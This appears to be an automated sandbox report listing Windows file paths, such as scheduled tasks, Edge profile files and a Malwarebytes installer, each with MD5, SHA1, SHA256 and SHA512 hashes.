SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4d965c501f00fc4724e933f77928adc5
SHA1 8ea7071386b3784add3f03cebf213ea0af6d3671
SHA256 ba76307a3441ae60acfc5b1731295d5cc42998cf6b841e29c14c348a2a09780d
SHA512 123d5d01c4fd27aae1dae7d110b9d948160e308adf83c9b1083446fa703b220c15642d91352d2af2574e232d22d710fe5b1f5545bb480383db8515b1da8c9fd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57ea41.TMP

MD5 6e89ddd0ca790011f3c6942e79708dec
SHA1 1da67f9091c5aa8e293232365754ee1d61d192e2
SHA256 45b3653e3bf382d23889bad1ccb360f1cc4e55f9b0eebfcdb76b8cf99e450c10
SHA512 cf6115c1183495ebd26beac3c1e0641182da6efad7cc1181a9c8731cae028d60181c48d1568c6e338892666f4aec47431222692facefca09392bff3f6536dba8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5dadef3a499a9ee3c6a2793df0adfc9c
SHA1 695a7d6b52fb3154c334d77887719640d73e1fb3
SHA256 0e4f9cc38e81f06bfd97e3cc8b6f186677366fd316345ac80bb9e89d23c5cbee
SHA512 3c9f5d3cd22e52e575432471f4f9ac2c79bf9c96ef981993aa818b02783d34a5fa604e8f2029928d9739fcf7ba5e6b3a5cc9a89e194d89aec09acda6c7735e7f

C:\Users\Admin\Downloads\MBSetup.exe

MD5 6107ffe4a1a1ee9eb2453ca669791ac9
SHA1 8f69617ffd69adab260500ec25d5ae50cc49b882
SHA256 3c68baabc345c58d95825e548a395d305775b7f0313ec42997c17870ea6a458f
SHA512 305ed565d5b61271e3deac9ab254ce2d70c031f4713c9b37212ea56ff061b8ce0afb5002c02a5252991c506d217f3f6aad439c192384646432f2ae71c252fb56

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 cfc2155d28413b5bd6e61cc66f6e4e81
SHA1 1d83d1c508574c5a08f0d637745f11f3c5f85c03
SHA256 0f98ddfb1c206dccfcfb2e1c068b2408be8d36a258c205229078175a304afca7
SHA512 c5415a2dde8aa32410034ee44bb819e2e17ed2869e54c9baca5e729dfce686b8bdfbd4dafc9effefce2af841b86815c70858dffe97b1ef211c093d32e9bb03ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b5ace956334a3a1f33104605d6ed1eaa
SHA1 823ce8c2eb232bee4677058e6ee2a007e18bb1e9
SHA256 04319f85b3710e0a8fcb2294ce6184eb02426a7f73dd3f5f0164bfb714fa5d9d
SHA512 79efe441f269ea8e853a442a769e7ef12c01c046de2dec368cdfd28be8522d96bf141dfe71c5e629efa1936f8cca00f95b7f09fede19af0bb9896d6599cef73f

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 5c4ed3fd5d4318fe8ffd4cd54be345cf
SHA1 78976d9a5882a2f144a6afe8ae266570d80df3e9
SHA256 88881a7c48b9dc896927ee824e59eff9ab27c18418e6d9281d1dc4977d7ba586
SHA512 6f9aeaa6944f71555890a44e872d4eb8728122ca1cf1ddffb3fdc22cf4b10e99f43e92dabe3a1e434734d6c677eae7d487fce4102d5045d6ba7477423f85302a

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe

MD5 a545b29abb9db951e9e2508a1bbc8d2a
SHA1 061494912b29c965638263b7321a54b9e0399417
SHA256 7607ca2abc8f5dfe7a100ccf73d885375ec599b0648ebd964ffb8bff39c821df
SHA512 e7e33f5e49570ea74d427e12c049a7f0f89f7e4d3c7c511f59170cfb166bb5dd49ebfaa5a968dfdc15758f3177d7d39beebce26e593629aa0eac630748b403f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a32daf4d026b1eb631484bd31df1a12d
SHA1 0fbc48c12782c4bfcc0f16ec6cf1cd818d72b33c
SHA256 b561480fb3e23940879d91fbc48a27229efdab3b12354b15680e5bb660540c22
SHA512 694cd5c69a738ae2c7ebb1d125b880dd93f6a283667a9ca18289a48d658d8490e0721f73104160086ee3b678cb84cd5da1285df50001374733430e033c8bb668

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90

MD5 ca401ed0f6d72ecb36603df52e549877
SHA1 69e7b365c32ef2b2ccf4673073378fcb224a77da
SHA256 043d123aa9217dcc977d84df863e0bd18c4f3063e29b145ad20a7812a8d3a37d
SHA512 2797223e47a3cb3af1116dcd37cba675be7533328d034e5dbc6f332a33d1adde499663dbee392a4dd5fc97de6bf04ed357a458171e61af6dfb040ea1372f0a7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

MD5 f69555dad7587f03ed3c65cae3241a99
SHA1 2ff8ea1e1fca37f952537dc72d596733d11c10b5
SHA256 6bafeaeba74d0551c9ab96519ef4387f7b52afd919354924f69dd1bb6429c361
SHA512 b35451522315e01c5cae0ca7f44e24499fe31140347804e2ef41dd261db4fd9940963822c0286cdef7d7557243daa9c8f4913e286e5765f8e14aa7449d9cc9e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

MD5 966e3ab17eeb2f84299793a0bd1406c3
SHA1 66f84a8c01efb963a1b771c42f9a8f309ab98ac2
SHA256 d9db9b3d916785cec070bb305e18ede6617a8bbb14ec7956728bc6c9afe878f2
SHA512 c4701bd64701c59ed9e6afaf3cc32e4c64ded17d5de6036616495c7833a41da76947f70a87a5199884a6a06beca8b6e9b3a5b67e80ba6d3a358a3b9a95aa650f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637

MD5 301afb7160b629147c36f2e75980bae9
SHA1 9d0f76e117b9179705a3c82455b670fd4471ca70
SHA256 5667ba628770d5be7e634ea6bdffe9f7abcf027f02ad37d1b94defff269d3e87
SHA512 f07044cae2dead59b4fcca0a068b5ad63f589ea0864838f8773e41971b24e342b0dc59f5b275748d93ad17718fc9edbfa3db22d27bc2896dcf1ffd7350ab1a44